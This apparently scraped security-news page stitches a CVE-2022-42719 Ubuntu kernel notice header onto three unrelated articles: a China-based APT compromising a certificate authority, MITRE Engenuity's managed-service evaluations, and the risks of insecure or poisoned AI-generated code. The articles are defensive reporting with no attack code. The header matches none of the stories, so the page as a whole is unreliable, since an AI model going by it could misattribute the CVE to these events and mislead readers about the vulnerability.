CVE-2022-42719Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-132.148  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1089.97  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1095.101  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1050.56  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1093.102  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1037.42  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1079.85  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1087.96  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1074.85  https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1089.97~18.04.1  https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1095.101~18.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-132.148~18.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1037.42~18.04.1  https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1087.96~18.04.1

Ubuntu Security Notice USN-5728-1

Access to digital certificates would allow the Chinese-speaking espionage group to sign its custom malware and skate by security scanners.

The state-sponsored cyberattack group known as Billbug managed to compromise a digital certificate authority (CA) as part of an wide-ranging espionage campaign that stretched back to March — a concerning development in the advanced persistent threat (APT) playbook, researchers warn.

Digital certificates are files that are used to sign software as valid, and verify the identity of a device or user to enable encrypted connections. As such, a CA compromise could lead to a legion of stealthy follow-on attacks.

"The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates, they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines," according to a report this week from Symantec. "It could also potentially use compromised certificates to intercept HTTPS traffic."

"This is potentially very dangerous," the researchers noted.

Others concur. 

“Certificate authorities are one of the most important elements of maintaining security in today’s digital world," Chris Hickman, CSO at Keyfactor, tells Dark Reading. "Much like a driver’s license or passport, digital certificates contain information about an individual or entity and are used to verify the authenticity of websites, devices, or organizations, ensuring an individual user that the entity that they’re communicating with online can be trusted. Think of this as the difference between issuing a real ID rather than a fake one — real IDs will always have some characteristics that cannot be replicated in a fake ID. The same holds true with certificates, which is why this dangerous.”

**An Ongoing Spate of Cyber-Compromises**

Billbug (aka Lotus Blossom or Thrip) is a China-based espionage group that mainly targets victims in Southeast Asia. It's known for big-game hunting — i.e., going after the secrets held by military organizations, governmental entities, and communications providers. Sometimes it casts a broader net, hinting at darker motivations: In one past instance, it infiltrated an aerospace operator to infect the computers that monitor and control the movements of satellites.

In the latest run of nefarious activity, the APT hit a pantheon of government and defense agencies throughout Asia, in one case infesting "a large number of machines" on a government network with its custom malware.

"This campaign was ongoing from at least March 2022 to September 2022, and it is possible this activity may be ongoing," says Brigid O Gorman, senior intelligence analyst at Symantec Threat Hunter Team. "Billbug is a long-established threat group that has carried out multiple campaigns over the years. It is possible that this activity could extend to additional organizations or geographies, though Symantec has no evidence of that at the moment."

**A Familiar Approach to Cyberattacks**

At those targets as well as at the CA, the initial access vector has been the exploitation of vulnerable, public-facing applications. After gaining the ability to execute code, the threat actors go on to install their known, custom Hannotog or Sagerunex backdoors before burrowing deeper into networks.

For the later kill-chain stages, Billbug attackers use multiple living-off-the-land binaries (LoLBins), such as AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Tracert, Winmail, and WinRAR, according to Symantec's report.

These legitimate tools can be abused for various doppelganger uses, such as querying Active Directory to map a network, ZIP-ing files for exfiltration, uncovering paths between endpoints, scanning NetBIOS and ports, and installing browser root certificates — not to mention downloading additional malware.

The custom backdoors combined with dual-use tools is a familiar footprint, having been used by the APT in the past. But the lack of concern about public exposure is par for the course for the group.

"It's notable that Billbug appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past," says Gorman.

She adds, "The group's heavy use of living off the land and dual-use tools is also notable, and underlines the need for organizations to have in place security products that can not only detect malware, but can also recognize if legitimate tools are potentially being used in a suspicious or malicious manner."

Symantec has notified the unnamed CA in question to inform it of the activity, but Gorman declined to offer further details as to its response or remediation efforts.

While there's no indication so far that the group was able to go on to compromise actual digital certificates, the researcher advises, "Enterprises should be aware that malware could be signed with valid certificates if threat actors are able to achieve access to cert authorities."

In general, organizations should adopt a defense-in-depth strategy, using multiple detection, protection, and hardening technologies to mitigate risk at each point of a potential attack chain, she says.

"Symantec would also advise implementing proper audit and control of administrative account usage," Gorman notes. "We'd also suggest creating profiles of usage for admin tools as many of these tools are used by attackers to move laterally undetected through a network. Across the board, multifactor authentication (MFA) can help limit the usefulness of compromised credentials."

China-Based Billbug APT Infiltrates Certificate Authority

The results are labor-intensive to parse, so knowing how to interpret them is key, security experts say.

A new set of evaluations for managed security service providers that MITRE Engenuity has released can potentially give enterprise decision-makers a handy resource to consult when selecting a provider. The key to benefiting from the information, though, is knowing how to interpret the results, MITRE and others said this week.

MITRE Engenuity's first-ever evaluation of security service providers — like its product evaluations — does not offer any winners or losers, nor any rankings based on performance, nor any indication of how well, or poorly, a vendor might have performed. 

Instead, it offers detailed information on how different security service providers analyze and describe adversary behavior to their clients. MITRE's evaluation leaves it entirely up to security professionals and teams using the data to make any vendor comparisons they might want with it.

**An Objective Look at MDR Capabilities**

"MITRE Engenuity’s ATT&CK Evaluations for Managed Services is likely the only objective demonstration of what’s available in the managed services and managed detection and response (MDR) market," says Katie Nickels, director of intelligence at Red Canary, one of 16 security service providers that participated in the evaluation. "It allows organizations to see a realistic demonstration of how these tools actually work, with those results being provided by a neutral third party."

For the evaluation, MITRE Engenuity gave each of the participating vendors an opportunity to deploy their adversary detection and monitoring tools on a MITRE-hosted Microsoft Azure environment. A MITRE purple team then executed an emulated attack on the environment using tactics and techniques of the well-known Iranian threat group OilRig. 

Service providers that participated in the evaluation knew the simulated attack would happen within business hours in a specific two-week period. However, MITRE did not inform them of more exact timing, what techniques it would use, or which adversary MITRE Engenuity was emulating.

In carrying out the simulated attack, MITRE Engenuity's team showcased commonly used adversary tactics such as spear-phishing for initial access, credential dumping, Web shell installation, lateral movement, data exfiltration, and cleanup. Vendors had an opportunity to use any of the tools in their MDR portfolio to evaluate the malicious activity and report on it. 

But MITRE's rules prohibited them from taking any steps to respond or block the attack because the goal was to see how each service provider detected and analyzed the unfolding attack and the detail and clarity with which it reported their findings.

**Parsing the Results Can Be Challenging**

MITRE Engenuity's evaluation results for each participating service provider offers both a high-level and a detailed view of how each of them detected the attack through the entire chain. It provides a look at the depth of the analysis each vendor provided at each stage, their communications with MITRE during the emulation, the individual techniques that they spotted and reported on, and what context and information they provided about the attack.

The information can be very useful for skilled security professionals who don't have the resources to do their own bake-off and are willing to compare results themselves, says John Pescatore, director of emerging security trends at the SANS Institute. But the data can be difficult to parse for others, he says. 

"MITRE Engenuity purposely doesn't make it easy to rank vendors in their evals," Pescatore says. "So, the tests are not useful for someone who just wants to make a 'safe' choice or compete the top three against each other."

"To compare, I’d have to look at each one and count how many techniques, etc., they covered, and I’d get some kind of ranking,' Pescatore notes. "But in order to understand how they did it, to see how that would fit with my processes, I have to either get info from the vendor or play with the product or service myself."

**Context Is Key**

Nickels from Red Canary says that while the results don't offer a clear apples-to-apples comparison between vendors, that’s not the point. "Every provider is different in how it detects activity and communicate findings, and every organization and security team has different needs," she says.

The best way to get an understanding of the value provided by each vendor in MITRE Engenuity's evaluation is to consider qualitative aspects, such as how each vendor communicated with MITRE during the emulation, the screen shots they took, and the analysis and context they might have provided, she says: "Examining these resources, while labor intensive, will offer organizations the best view into the value provided by each vendor."

In a report this week, Red Canary also highlighted what it described as some limitations of the MITRE Engenuity tests, such as it being too endpoint-focused and being too heavily weighted toward detection coverage and not enough on response. 

"The test required participants to turn off many preventive and other security controls," Nickels says. "Under normal circumstances, most of the vendors who participated would have detected and responded to MITRE’s emulation activity relatively early, thereby preventing the more impactful, later-stage activity."

Another factor to keep in mind when interpreting the results is whether all participating vendors deployed technologies that they normally use for MDR, or if they used something else for the evaluation. "We recommend organizations reviewing these results ask vendors if their environment was normal for the average customer."

**MITRE Engenuity's Recommendation**

In a blog post, Ashwin Radhakrishnan, MITRE Engenuity's general manager of ATT&CK evaluations, recommended that users consider the results in the proper context. Like Nickels noted, MITRE too strongly recommended against organizations merely looking at the total number of techniques a vendor might have detected as the sole yardstick.

"Before starting any analysis of technique coverage, it is important to determine which techniques are most relevant to your organization based on the adversary groups and threats that your organization faces," MITRE said. The blog post offered 10 ways that security practitioners should interpret the evaluation results.

The recommendations include looking at top-level report statuses of the service providers to get a high-level understanding of how they performed in the evaluation, looking at how the service providers presented their findings to their customers, and determining if the service providers correctly attributed the adversary (OilRig). Some of the other measures users consider is whether the service providers recommended any mitigation measures; the length of their reports; the clarity of the language in the reports; and the details in their own releases about the evaluations, MITRE Engenuity said.

MITRE Engenuity Launches Evaluations for Security Service Providers

Autocompleted code is convenient and quick, but it may expose your organization to security and compliance risks.

In recent months, we've marveled at the quality of computer-generated faces, cat pictures, videos, essays, and even art. Artificial intelligence (AI) and machine learning (ML) have also quietly slipped into software development, with tools like GitHub Copilot, Tabnine, Polycode, and others taking the logical next step of putting existing code autocomplete functionality on AI steroids. Unlike cat pics, though, the origin, quality, and security of application code can have wide-reaching implications — and at least for security, research shows that the risk is real.

Prior academic research has already shown that GitHub Copilot often generates code with security vulnerabilities. More recently, hands-on analysis from Invicti security engineer Kadir Arslan showed that insecure code suggestions are still the rule rather than the exception with Copilot. Arslan found that suggestions for many common tasks included only the absolute bare bones, often taking the most basic and least secure route, and that accepting them without modification could result in functional but vulnerable applications.

A tool like Copilot is (by design) autocompletion turned up a notch, trained on open source code to suggest snippets that could be relevant in a similar context. This makes the quality and security of suggestions closely tied to the quality and security of the training set. So the bigger questions are not about Copilot or any other specific tool but about AI-generated software code in general.

It's reasonable to assume Copilot is only the tip of the spear and that similar generators will become commonplace in the years ahead. This means we, the technology industry, need to start asking how such code is being generated, how it's used, and who will take responsibility when things go wrong.

**Satnav Syndrome**

Traditional code autocompletion that looks up function definitions to complete function names and remind you what arguments you need is a massive time-saver. Because these suggestions are merely a shortcut to looking up the docs for yourself, we've learned to implicitly trust whatever the IDE suggests. Once an AI-powered tool comes in, its suggestions are no longer guaranteed to be correct — but they still feel friendly and trustworthy, so they are more likely to be accepted.

Especially for less experienced developers, the convenience of getting a free block of code encourages a shift of mindset from, "Is this code close enough to what I would write" to, "How can I tweak this code so it works for me."

GitHub very clearly states that Copilot suggestions should always be carefully analyzed, reviewed, and tested, but human nature dictates that even subpar code will occasionally make it into production. It's a bit like driving while looking more at your GPS than the road.

**Supply Chain Security Issues**

The Log4j security crisis has moved software supply chain security and, specifically, open source security into the limelight, with a recent White House memo on secure software development and a new bill on improving open source security. With these and other initiatives, having any open source code in your applications could soon need to be written into a software bill of materials (SBOM), which is only possible if you knowingly include a specific dependency. Software composition analysis (SCA) tools also rely on that knowledge to detect and flag outdated or vulnerable open source components.

But what if your application includes AI-generated code that, ultimately, originates from an open source training set? Theoretically, if even one substantial suggestion is identical to existing code and accepted as-is, you could have open source code in your software but not in your SBOM. This could lead to compliance issues, not to mention the potential for liability if the code turns out to be insecure and results in a breach — and SCA won't help you, as it can only find vulnerable dependencies, not vulnerabilities in your own code.

**Licensing and Attribution Pitfalls**

Continuing that train of thought, to use open source code, you need to comply with its licensing terms. Depending on the specific open source license, you will at least need to provide attribution or sometimes release your own code as open source. Some licenses forbid commercial use altogether. Whatever the license, you need to know where the code came from and how it's licensed.

Again, what if you have AI-generated code in your application that happens to be identical to existing open source code? If you had an audit, would it find that you are using code without the required attribution? Or maybe you need to open source some of your commercial code to remain compliant? Perhaps that's not yet a realistic risk with current tools, but these are the kind of questions we should all be asking today, not in 10 years' time. (And to be clear, GitHub Copilot does have an optional filter to block suggestions that match existing code to minimize supply chain risks.)

**Deeper Security Implications**

Going back to security, an AI/ML model is only as good (and as bad) as its training set. We've seen that in the past — for example, in cases of face recognition algorithms showing racial biases because of the data they were trained on. So if we have research showing that a code generator frequently produces suggestions with no consideration for security, we can infer that this is what its learning set (i.e., publicly available code) was like. And what if insecure AI-generated code then feeds back into that code base? Can the suggestions ever be secure?

The security questions don't stop there. If AI-based code generators gain popularity and start to account for a meaningful proportion of new code, it's likely somebody will try to attack them. It's already possible to fool AI image recognition by poisoning its learning set. Sooner or later, malicious actors will try to put uniquely vulnerable code in public repositories in the hope that it comes up in suggestions and eventually ends up in a production application, opening it up to an easy attack.

And what about monoculture? If multiple applications end up using the same highly vulnerable suggestion, whatever its origin, we could be looking at vulnerability epidemics or maybe even AI-specific vulnerabilities.

**Keeping an Eye on AI**

Some of these scenarios may seem far-fetched today, but they are all things that we in the tech industry need to discuss. Again, GitHub Copilot is in the spotlight only because it currently leads the way, and GitHub provides clear warnings about the caveats of AI-generated suggestions. As with autocomplete on your phone or route suggestions in your satnav, they are only hints to make our lives easier, and it's up to us to take them or leave them.

With their potential to exponentially improve development efficiency, AI-based code generators are likely to become a permanent part of the software world. In terms of application security, though, this is yet another source of potentially vulnerable code that needs to pass rigorous security testing before being allowed into production. We're looking at a brand new way to slip vulnerabilities (and potentially unchecked dependencies) directly into your first-party code, so it makes sense to treat AI-augmented codebases as untrusted until tested — and that means testing everything as often as you can.

Even relatively transparent ML solutions like Copilot already raise some legal and ethical questions, not to mention security concerns. But just imagine that one day, some new tool starts generating code that works perfectly and passes security tests, except for one tiny detail: Nobody knows how it works. That's when it’s time to panic.

Tag

#intel